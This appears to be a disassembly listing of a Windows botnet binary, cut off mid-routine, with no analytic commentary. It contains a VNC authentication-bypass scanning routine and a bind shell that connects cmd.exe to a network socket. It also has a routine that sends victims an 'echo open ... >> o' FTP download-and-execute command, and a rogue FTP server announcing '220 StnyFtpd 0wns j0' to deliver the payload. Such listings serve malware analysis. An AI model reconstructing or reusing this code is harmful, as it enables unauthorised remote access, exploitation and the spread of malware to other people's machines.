loc_40EAA1: ; CODE XREF: sub_40E9ED+74�j
pop edi
pop esi
leave
retn
sub_40E9ED endp
; =============== S U B R O U T I N E =======================================
sub_40EAA5 proc near ; CODE XREF: _0:0040EB95�p _0:0040EBF7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
xor esi, esi
jmp short loc_40EAD0
; ---------------------------------------------------------------------------
loc_40EAAF: ; CODE XREF: sub_40EAA5+2D�j
mov eax, [esp+8+arg_4]
push 0
add eax, esi
push edi
push eax
push [esp+14h+arg_0]
call ds:dword_4E2FE0 ; recv
test eax, eax
jz short loc_40EADA
cmp eax, 0FFFFFFFFh
jz short loc_40EADA
sub edi, eax
add esi, eax
loc_40EAD0: ; CODE XREF: sub_40EAA5+8�j
test edi, edi
jg short loc_40EAAF
xor eax, eax
inc eax
loc_40EAD7: ; CODE XREF: sub_40EAA5+37�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EADA: ; CODE XREF: sub_40EAA5+20�j
; sub_40EAA5+25�j
xor eax, eax
jmp short loc_40EAD7
sub_40EAA5 endp
; =============== S U B R O U T I N E =======================================
sub_40EADE proc near ; CODE XREF: _0:0040EBE1�p _0:0040EC0E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_40EB1B
xor esi, esi
test edi, edi
jle short loc_40EB15
loc_40EAEE: ; CODE XREF: sub_40EADE+35�j
mov eax, edi
push 0
sub eax, esi
push eax
mov eax, [esp+10h+arg_4]
add eax, esi
push eax
push [esp+14h+arg_0]
call ds:dword_4E3018 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40EB1B
test eax, eax
jz short loc_40EB1B
add esi, eax
cmp esi, edi
jl short loc_40EAEE
loc_40EB15: ; CODE XREF: sub_40EADE+E�j
xor eax, eax
inc eax
loc_40EB18: ; CODE XREF: sub_40EADE+3F�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EB1B: ; CODE XREF: sub_40EADE+8�j
; sub_40EADE+2B�j ...
xor eax, eax
jmp short loc_40EB18
sub_40EADE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 24Ch
mov ax, ds:word_44A3D4
push ebx
push esi
push 0
push 1
push 2
pop esi
mov [ebp-2], ax
push esi
call ds:dword_4E3048 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_40EB4C
push eax
jmp short loc_40EB80
; ---------------------------------------------------------------------------
loc_40EB4C: ; CODE XREF: _0:0040EB47�j
lea eax, [ebp+0Ch]
push eax
call ds:dword_4E3008 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-48h], eax
mov [ebp-4Ch], si
call ds:dword_4E2FC8 ; htons
mov [ebp-4Ah], ax
lea eax, [ebp-4Ch]
push 10h
push eax
push ebx
call ds:dword_4E2F70 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40EB8D
push ebx
loc_40EB80: ; CODE XREF: _0:0040EB4A�j
call ds:dword_4E3060 ; closesocket
xor eax, eax
jmp loc_40EDAE
; ---------------------------------------------------------------------------
loc_40EB8D: ; CODE XREF: _0:0040EB7D�j
push edi
lea eax, [ebp-38h]
push 0Ch
push eax
push ebx
call sub_40EAA5
add esp, 0Ch
test eax, eax
jz loc_40EDA2
lea eax, [ebp-20h]
and byte ptr [ebp-2Ch], 0
push eax
lea eax, [ebp-28h]
push eax
lea eax, [ebp-38h]
push offset dword_44A3D8
push eax
call sub_41FF30
add esp, 10h
cmp eax, esi
jnz loc_40EDA2
cmp dword ptr [ebp-28h], 3
jz short loc_40EBDA
cmp dword ptr [ebp-20h], 8
jnz loc_40EDA2
loc_40EBDA: ; CODE XREF: _0:0040EBCE�j
lea eax, [ebp-38h]
push 0Ch
push eax
push ebx
call sub_40EADE
add esp, 0Ch
test eax, eax
jz loc_40EDA2
lea eax, [ebp-3Ch]
push esi
push eax
push ebx
call sub_40EAA5
add esp, 0Ch
test eax, eax
jz loc_40EDA2
lea eax, [ebp-2]
push 1
push eax
push ebx
call sub_40EADE
add esp, 0Ch
test eax, eax
jz loc_40EDA2
lea eax, [ebp-24h]
push 4
push eax
push ebx
call sub_40EAA5
add esp, 0Ch
test eax, eax
jz loc_40EDA2
mov eax, [ebp-24h]
mov edi, 0FF0000h
mov ecx, eax
mov edx, eax
and ecx, edi
mov esi, 0FF00h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, esi
or edx, eax
shr ecx, 8
shl edx, 8
or ecx, edx
mov [ebp-24h], ecx
jnz loc_40EDA2
push 1
push offset dword_4E5CEC
push ebx
call sub_40EADE
add esp, 0Ch
test eax, eax
jz loc_40EDA2
lea eax, [ebp-1Ch]
push 18h
push eax
push ebx
call sub_40EAA5
add esp, 0Ch
test eax, eax
jz loc_40EDA2
mov ecx, [ebp-1Ch]
xor edx, edx
mov dl, [ebp-1Bh]
mov eax, 0FFh
shl ecx, 8
xor dl, cl
and dx, ax
xor edx, ecx
mov ecx, [ebp-1Ah]
mov [ebp-1Ch], dx
xor edx, edx
mov dl, [ebp-19h]
shl ecx, 8
xor dl, cl
and dx, ax
xor edx, ecx
mov ecx, [ebp-14h]
mov [ebp-1Ah], dx
xor edx, edx
mov dl, [ebp-13h]
shl ecx, 8
xor dl, cl
and dx, ax
xor edx, ecx
mov ecx, [ebp-12h]
mov [ebp-14h], dx
xor edx, edx
mov dl, [ebp-11h]
shl ecx, 8
xor dl, cl
and dx, ax
xor edx, ecx
mov ecx, [ebp-10h]
mov [ebp-12h], dx
xor edx, edx
mov dl, [ebp-0Fh]
shl ecx, 8
xor dl, cl
and dx, ax
xor edx, ecx
mov ecx, [ebp-8]
mov [ebp-10h], dx
mov eax, ecx
mov edx, ecx
and eax, edi
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, esi
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp-8], eax
add eax, 2
push eax
call sub_420C30
push dword ptr [ebp-8]
mov esi, eax
push esi
push ebx
call sub_40EDB2
lea eax, [ebp+0Ch]
push eax
push esi
push dword ptr [ebp-20h]
lea eax, [ebp-24Ch]
push dword ptr [ebp-28h]
push offset aVncD_DSSAuthby ; "VNC%d.%d %s: %s - [AuthBypass]"
push 200h
push eax
call sub_41EC30
push 0
lea eax, [ebp-24Ch]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_409C75
add esp, 40h
lea eax, [ebp-24Ch]
push eax
call sub_415A3C
mov eax, [ebp+0B0h]
xor esi, esi
shl eax, 6
pop ecx
lea eax, dword_4481F8[eax]
inc dword ptr [eax]
inc esi
jmp short loc_40EDA4
; ---------------------------------------------------------------------------
loc_40EDA2: ; CODE XREF: _0:0040EB9F�j _0:0040EBC4�j ...
xor esi, esi
loc_40EDA4: ; CODE XREF: _0:0040EDA0�j
push ebx
call ds:dword_4F5538 ; closesocket
mov eax, esi
pop edi
loc_40EDAE: ; CODE XREF: _0:0040EB88�j
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40EDB2 proc near ; CODE XREF: _0:0040ED3B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
push edi
mov edi, [esp+8+arg_4]
test esi, esi
jle short loc_40EDCE
push esi
push edi
push [esp+10h+arg_0]
call sub_40EAA5
add esp, 0Ch
loc_40EDCE: ; CODE XREF: sub_40EDB2+C�j
and byte ptr [edi+esi], 0
pop edi
pop esi
retn
sub_40EDB2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EDD5 proc near ; DATA XREF: sub_40EE63+15B�o
var_404 = byte ptr -404h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_40EDDE: ; CODE XREF: sub_40EDD5+25�j
; sub_40EDD5+41�j
push 0
lea eax, [ebp+var_404]
push 400h
push eax
push ds:dword_4E5D00
call ds:dword_4E2FE0 ; recv
test eax, eax
jle short loc_40EDDE
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
lea eax, [ebp+var_404]
push eax
push ds:dword_4E5CFC
call ds:dword_4F53B4 ; WriteFile
jmp short loc_40EDDE
sub_40EDD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EE18 proc near ; DATA XREF: sub_40EE63+142�o
var_404 = byte ptr -404h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_40EE21: ; CODE XREF: sub_40EE18+2F�j
; sub_40EE18+49�j
lea eax, [ebp+var_4]
and [ebp+var_4], 0
push 0
push eax
lea eax, [ebp+var_404]
push 400h
push eax
push ds:dword_4E5CF0
call ds:off_4F53BC
cmp [ebp+var_4], 0
jle short loc_40EE21
push 0
lea eax, [ebp+var_404]
push [ebp+var_4]
push eax
push ds:dword_4E5D00
call ds:dword_4E3018 ; send
jmp short loc_40EE21
sub_40EE18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EE63 proc near ; DATA XREF: sub_401C87+2D05�o
var_11C = byte ptr -11Ch
var_98 = dword ptr -98h
var_7C = dword ptr -7Ch
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_38 = word ptr -38h
var_36 = word ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 28h
mov esi, eax
pop ecx
lea edi, [ebp+var_11C]
rep movsd
xor esi, esi
xor edi, edi
inc esi
push 10h
mov [eax+98h], esi
lea eax, [ebp+var_38]
push edi
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_38], 2
push [ebp+var_98]
call ds:dword_4E2FC8 ; htons
push 6
push esi
push 2
mov [ebp+var_36], ax
call ds:dword_4E3048 ; socket
mov [ebp+arg_0], eax
lea eax, [ebp+var_38]
push 10h
push eax
push [ebp+arg_0]
call ds:dword_4E2FF4 ; bind
push 5
push [ebp+arg_0]
call ds:dword_4E2FF0 ; listen
mov ebx, ds:dword_4F53D0
mov esi, ds:off_4F533C
loc_40EEE3: ; CODE XREF: sub_40EE63+1CB�j
push edi
push edi
push [ebp+arg_0]
call ds:dword_4E305C ; accept
mov ds:dword_4E5D00, eax
lea eax, [ebp+var_C]
push edi
push eax
push offset dword_4E5CFC
push offset dword_4E5CF8
mov [ebp+var_C], 0Ch
mov [ebp+var_4], 1
mov [ebp+var_8], edi
call ebx ; CreatePipe
lea eax, [ebp+var_C]
push edi
push eax
push offset dword_4E5CF4
push offset dword_4E5CF0
call ebx ; CreatePipe
push 44h
lea eax, [ebp+var_7C]
push edi
push eax
call sub_41E4B0
mov eax, ds:dword_4E5CF8
add esp, 0Ch
mov [ebp+var_44], eax
mov eax, ds:dword_4E5CF4
mov [ebp+var_40], eax
push edi
push 1
lea eax, [ebp+var_3C]
push 2
push eax
mov [ebp+var_7C], 44h
mov [ebp+var_50], 101h
mov [ebp+var_4C], di
call ds:dword_4F53CC ; GetCurrentProcess
push eax
push ds:dword_4E5CF4
call ds:dword_4F53CC ; GetCurrentProcess
push eax
call ds:dword_4F53C8 ; DuplicateHandle
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_7C]
push eax
push edi
push edi
push 4000090h
lea eax, [ebp+var_C]
push 1
push eax
lea eax, [ebp+var_C]
push eax
push offset aCmd_exe ; "cmd.exe"
push edi
call ds:dword_4F5340 ; CreateProcessA
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40EE18
lea eax, [ebp+var_C]
push edi
push eax
call ds:dword_4F5350 ; CreateThread
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40EDD5
lea eax, [ebp+var_C]
push edi
push eax
call ds:dword_4F5350 ; CreateThread
push 0FFFFFFFFh
mov [ebp+var_10], eax
push [ebp+var_28]
call ds:dword_4F5374 ; WaitForSingleObject
push edi
push [ebp+var_10]
call ds:dword_4F5380 ; TerminateThread
push edi
push [ebp+var_14]
call ds:dword_4F5380 ; TerminateThread
push [ebp+var_10]
call esi ; sub_50B3D5
push [ebp+var_14]
call esi ; sub_50B3D5
push edi
push [ebp+var_28]
call ds:dword_4F53C4 ; TerminateProcess
push ds:dword_4E5CF8
call esi ; sub_50B3D5
push ds:dword_4E5CFC
call esi ; sub_50B3D5
push ds:dword_4E5CF0
call esi ; sub_50B3D5
push ds:dword_4E5CF4
call esi ; sub_50B3D5
push [ebp+var_24]
call esi ; sub_50B3D5
push [ebp+var_28]
call esi ; sub_50B3D5
jmp loc_40EEE3
sub_40EE63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40F033 proc near ; DATA XREF: _2:0043F010�o
jmp $+5
sub_40F033 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F038 proc near
push 0FFFEh
push 400h
call sub_419313
pop ecx
mov ds:dword_4E5D04, eax
pop ecx
retn
sub_40F038 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F04F proc near ; DATA XREF: sub_40C049+352�o
var_6C0 = byte ptr -6C0h
var_2C0 = byte ptr -2C0h
var_C0 = byte ptr -0C0h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A4 = dword ptr -0A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 6C0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 27h
mov esi, eax
pop ecx
lea edi, [ebp+var_B0]
rep movsd
xor esi, esi
xor ebx, ebx
inc esi
push 10h
mov [eax+98h], esi
lea eax, [ebp+var_14]
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_A4]
call ds:dword_4E2FC8 ; htons
push ebx
push esi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], ebx
call ds:dword_4E3048 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jnz short loc_40F0F6
cmp [ebp+var_1C], ebx
jnz short loc_40F0D6
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_20]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_B0]
call sub_409C75
add esp, 14h
loc_40F0D6: ; CODE XREF: sub_40F04F+65�j
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
push [ebp+var_AC]
call sub_40B9A7
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_40F0F6: ; CODE XREF: sub_40F04F+60�j
mov eax, [ebp+var_AC]
push 10h
imul eax, 234h
mov ds:dword_455F0C[eax], edi
lea eax, [ebp+var_14]
push eax
push edi
call ds:dword_4E2FF4 ; bind
cmp eax, esi
mov ebx, 400h
jnz loc_40F1F1
call ds:dword_4E2F5C ; WSAGetLastError
cmp eax, 2740h
jz short loc_40F176
xor esi, esi
cmp [ebp+var_1C], esi
jnz short loc_40F156
push esi
lea eax, [ebp+var_2C0]
push [ebp+var_20]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_B0]
call sub_409C75
add esp, 14h
loc_40F156: ; CODE XREF: sub_40F04F+E5�j
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
push [ebp+var_AC]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_40F176: ; CODE XREF: sub_40F04F+DE�j
push 0FFFEh
push ebx
call sub_419313
pop ecx
mov ds:dword_4E5D04, eax
pop ecx
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
call ds:dword_4E2FF4 ; bind
cmp eax, esi
jnz short loc_40F1F1
call ds:dword_4E2F5C ; WSAGetLastError
xor esi, esi
cmp [ebp+var_1C], esi
jnz short loc_40F1D1
cmp eax, 2740h
jz short loc_40F1D1
push esi
lea eax, [ebp+var_2C0]
push [ebp+var_20]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_B0]
call sub_409C75
add esp, 14h
loc_40F1D1: ; CODE XREF: sub_40F04F+159�j
; sub_40F04F+160�j
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
push [ebp+var_AC]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_40F1F1: ; CODE XREF: sub_40F04F+CD�j
; sub_40F04F+14C�j
push 5
push edi
call ds:dword_4E2FF0 ; listen
cmp eax, esi
jz loc_40F2D6
mov [ebp+var_4], 10h
mov esi, offset byte_43F0FC
loc_40F20E: ; CODE XREF: sub_40F04F+1D7�j
; sub_40F04F+227�j ...
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C0]
push eax
push edi
call ds:dword_4E305C ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40F20E
cmp [ebp+var_1C], 0
jnz short loc_40F24F
push 0
lea eax, [ebp+var_2C0]
push [ebp+var_20]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_B0]
call sub_409C75
add esp, 14h
loc_40F24F: ; CODE XREF: sub_40F04F+1DD�j
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
pop ecx
lea eax, [ebp+var_2C0]
push 0
push 200h
push eax
push [ebp+arg_0]
call ds:dword_4E2FE0 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_40F20E
push esi
push esi
push ds:dword_4E2D00
push [ebp+var_B0]
call sub_40AEAD
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d >> o&echo user 1 >>o &e"...
lea eax, [ebp+var_6C0]
push ebx
push eax
call sub_41EC30
add esp, 1Ch
lea eax, [ebp+var_6C0]
push 0
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_6C0]
push eax
push [ebp+arg_0]
call ds:dword_4E3018 ; send
cmp eax, 0FFFFFFFFh
jz loc_40F20E
inc ds:dword_4E5D08
jmp loc_40F20E
; ---------------------------------------------------------------------------
loc_40F2D6: ; CODE XREF: sub_40F04F+1AD�j
push edi
call ds:dword_4E3060 ; closesocket
push [ebp+var_AC]
call sub_40B9A7
pop ecx
push 0
call ds:dword_4F53A0 ; ExitThread
sub_40F04F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F2F1 proc near ; DATA XREF: sub_40C049+22B�o
var_A70 = byte ptr -0A70h
var_8E0 = byte ptr -8E0h
var_6E0 = dword ptr -6E0h
var_4C8 = byte ptr -4C8h
var_448 = dword ptr -448h
var_444 = dword ptr -444h
var_43C = dword ptr -43Ch
var_338 = byte ptr -338h
var_2D4 = byte ptr -2D4h
var_2A0 = byte ptr -2A0h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_138 = byte ptr -138h
var_128 = byte ptr -128h
var_FC = byte ptr -0FCh
var_C8 = byte ptr -0C8h
var_B0 = byte ptr -0B0h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_3C = byte ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A70h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6E0]
inc ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A70]
xor esi, esi
push eax
push 101h
mov [ebp+var_1C], ebx
mov [ebp+var_2C], ebx
mov [ebp+var_24], ebx
mov [ebp+var_23C], esi
mov [ebp+var_43C], esi
call ds:dword_4F550C ; WSAStartup
push esi
push ebx
push 2
call ds:dword_4F553C ; socket
mov esi, ds:dword_4F5510
lea ecx, [ebp+var_1C]
push 4
push ecx
mov edi, 0FFFFh
push 4
push edi
push eax
mov [ebp+var_8], eax
call esi ; setsockopt
lea eax, [ebp+var_2C]
push 4
push eax
push 0FFFFFFFBh
push edi
mov edi, [ebp+var_8]
push edi
call esi ; setsockopt
lea eax, [ebp+var_24]
push eax
push 8004667Eh
push edi
call ds:dword_4F5514 ; ioctlsocket
mov ax, word ptr ds:dword_4E2D00
and [ebp+var_48], 0
push eax
mov [ebp+var_4C], 2
call ds:dword_4E2FC8 ; htons
mov [ebp+var_4A], ax
lea eax, [ebp+var_4C]
push 10h
push eax
push edi
call ds:dword_4F5518 ; bind
test eax, eax
jge short loc_40F3B7
mov eax, ebx
jmp loc_40F902
; ---------------------------------------------------------------------------
loc_40F3B7: ; CODE XREF: sub_40F2F1+BD�j
push 0Ah
push edi
call ds:dword_4F551C ; listen
mov [ebp+var_23C], ebx
mov ebx, ds:dword_4F5540
mov [ebp+var_238], edi
mov [ebp+var_4], edi
loc_40F3D5: ; CODE XREF: sub_40F2F1+11B�j
; sub_40F2F1+609�j
push 41h
lea esi, [ebp+var_23C]
pop ecx
lea edi, [ebp+var_43C]
rep movsd
xor edi, edi
lea eax, [ebp+var_43C]
push edi
push edi
push edi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call ds:dword_4F5544 ; select
cmp eax, 0FFFFFFFFh
jz loc_40F8FF
cmp [ebp+var_4], edi
mov [ebp+arg_0], edi
jl short loc_40F3D5
loc_40F40E: ; CODE XREF: sub_40F2F1+603�j
xor esi, esi
push 64h
lea eax, [ebp+var_2A0]
push esi
push eax
call sub_41E4B0
push 64h
lea eax, [ebp+var_B0]
push esi
push eax
call sub_41E4B0
add esp, 18h
lea eax, [ebp+var_43C]
push eax
push edi
call sub_43A942 ; __WSAFDIsSet
test eax, eax
jz loc_40F8ED
cmp edi, [ebp+var_8]
jnz short loc_40F4B7
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_138]
push eax
push [ebp+var_8]
call ds:dword_4F5520 ; accept
cmp eax, 0FFFFFFFFh
jz loc_40F8ED
mov edx, [ebp+var_23C]
xor ecx, ecx
cmp edx, esi
jbe short loc_40F489
loc_40F47B: ; CODE XREF: sub_40F2F1+196�j
cmp [ebp+ecx*4+var_238], eax
jz short loc_40F489
inc ecx
cmp ecx, edx
jb short loc_40F47B
loc_40F489: ; CODE XREF: sub_40F2F1+188�j
; sub_40F2F1+191�j
cmp ecx, edx
jnz short loc_40F49F
cmp edx, 40h
jnb short loc_40F49F
mov [ebp+ecx*4+var_238], eax
inc [ebp+var_23C]
loc_40F49F: ; CODE XREF: sub_40F2F1+19A�j
; sub_40F2F1+19F�j
cmp eax, [ebp+var_4]
jle short loc_40F4A7
mov [ebp+var_4], eax
loc_40F4A7: ; CODE XREF: sub_40F2F1+1B1�j
push esi
push 15h
push offset a220Stnyftpd0wn ; "220 StnyFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_40F8ED
; ---------------------------------------------------------------------------
loc_40F4B7: ; CODE XREF: sub_40F2F1+158�j
push esi
lea eax, [ebp+var_2A0]
push 64h
push eax
push edi
call ds:dword_4F5534 ; recv
test eax, eax
jg short loc_40F514
mov ecx, [ebp+var_23C]
xor eax, eax
cmp ecx, esi
jbe short loc_40F508
loc_40F4D8: ; CODE XREF: sub_40F2F1+1F3�j
cmp [ebp+eax*4+var_238], edi
jz short loc_40F4FD
inc eax
cmp eax, ecx
jb short loc_40F4D8
jmp short loc_40F508
; ---------------------------------------------------------------------------
loc_40F4E8: ; CODE XREF: sub_40F2F1+20F�j
mov ecx, [ebp+eax*4+var_234]
mov [ebp+eax*4+var_238], ecx
mov ecx, [ebp+var_23C]
inc eax
loc_40F4FD: ; CODE XREF: sub_40F2F1+1EE�j
dec ecx
cmp eax, ecx
jb short loc_40F4E8
dec [ebp+var_23C]
loc_40F508: ; CODE XREF: sub_40F2F1+1E5�j
; sub_40F2F1+1F5�j
push edi
call ds:dword_4F5538 ; closesocket
jmp loc_40F8ED
; ---------------------------------------------------------------------------
loc_40F514: ; CODE XREF: sub_40F2F1+1D9�j
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2A0]
push offset aSS_1 ; "%s %s"
push eax
call sub_41FF30
lea eax, [ebp+var_B0]
push offset aUser_1 ; "USER"
push eax
call sub_41F7E0
add esp, 18h
test eax, eax
jnz short loc_40F558
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_40F8D8
; ---------------------------------------------------------------------------
loc_40F558: ; CODE XREF: sub_40F2F1+258�j
lea eax, [ebp+var_B0]
push offset aPass ; "PASS"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F57C
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_40F8D8
; ---------------------------------------------------------------------------
loc_40F57C: ; CODE XREF: sub_40F2F1+27C�j
lea eax, [ebp+var_B0]
push offset aSyst ; "SYST"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F5A0
push esi
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_40F8D8
; ---------------------------------------------------------------------------
loc_40F5A0: ; CODE XREF: sub_40F2F1+2A0�j
lea eax, [ebp+var_B0]
push offset aRest ; "REST"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F5C4
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_40F8D8
; ---------------------------------------------------------------------------
loc_40F5C4: ; CODE XREF: sub_40F2F1+2C4�j
lea eax, [ebp+var_B0]
push offset off_44A514
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F5E8
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_40F8D8
; ---------------------------------------------------------------------------
loc_40F5E8: ; CODE XREF: sub_40F2F1+2E8�j
lea eax, [ebp+var_B0]
push offset aType ; "TYPE"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F623
lea eax, [ebp+var_338]
push offset aA_0 ; "A"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F623
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_40F8D8
; ---------------------------------------------------------------------------
loc_40F623: ; CODE XREF: sub_40F2F1+30C�j
; sub_40F2F1+323�j
lea eax, [ebp+var_B0]
push offset aType_0 ; "TYPE"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F65E
lea eax, [ebp+var_338]
push offset aI_0 ; "I"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F65E
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_40F8D8
; ---------------------------------------------------------------------------
loc_40F65E: ; CODE XREF: sub_40F2F1+347�j
; sub_40F2F1+35E�j
lea eax, [ebp+var_B0]
push offset aPasv ; "PASV"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F6AC
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+var_128]
rep movsd
push eax
lea eax, [ebp+var_128]
push eax
movsw
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_128]
loc_40F69C: ; CODE XREF: sub_40F2F1+3FA�j
push eax
push [ebp+arg_0]
call ebx ; send
mov edi, [ebp+arg_0]
xor esi, esi
jmp loc_40F8DB
; ---------------------------------------------------------------------------
loc_40F6AC: ; CODE XREF: sub_40F2F1+382�j
lea eax, [ebp+var_B0]
push offset aList_0 ; "LIST"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F6ED
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C8]
rep movsd
movsw
push eax
lea eax, [ebp+var_C8]
push eax
movsb
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_C8]
jmp short loc_40F69C
; ---------------------------------------------------------------------------
loc_40F6ED: ; CODE XREF: sub_40F2F1+3D0�j
lea eax, [ebp+var_B0]
push offset aPort ; "PORT"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_40F7BE
lea eax, [ebp+var_2D4]
push eax
lea eax, [ebp+var_FC]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_2A0]
push offset aS_13 ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_41FF30
lea eax, [ebp+var_FC]
push eax
call sub_41E710
mov [ebp+var_C], eax
lea eax, [ebp+var_2D4]
push eax
call sub_41E710
mov [ebp+arg_0], eax
push 32h
lea eax, [ebp+var_FC]
push esi
push eax
call sub_41E4B0
push [ebp+arg_0]
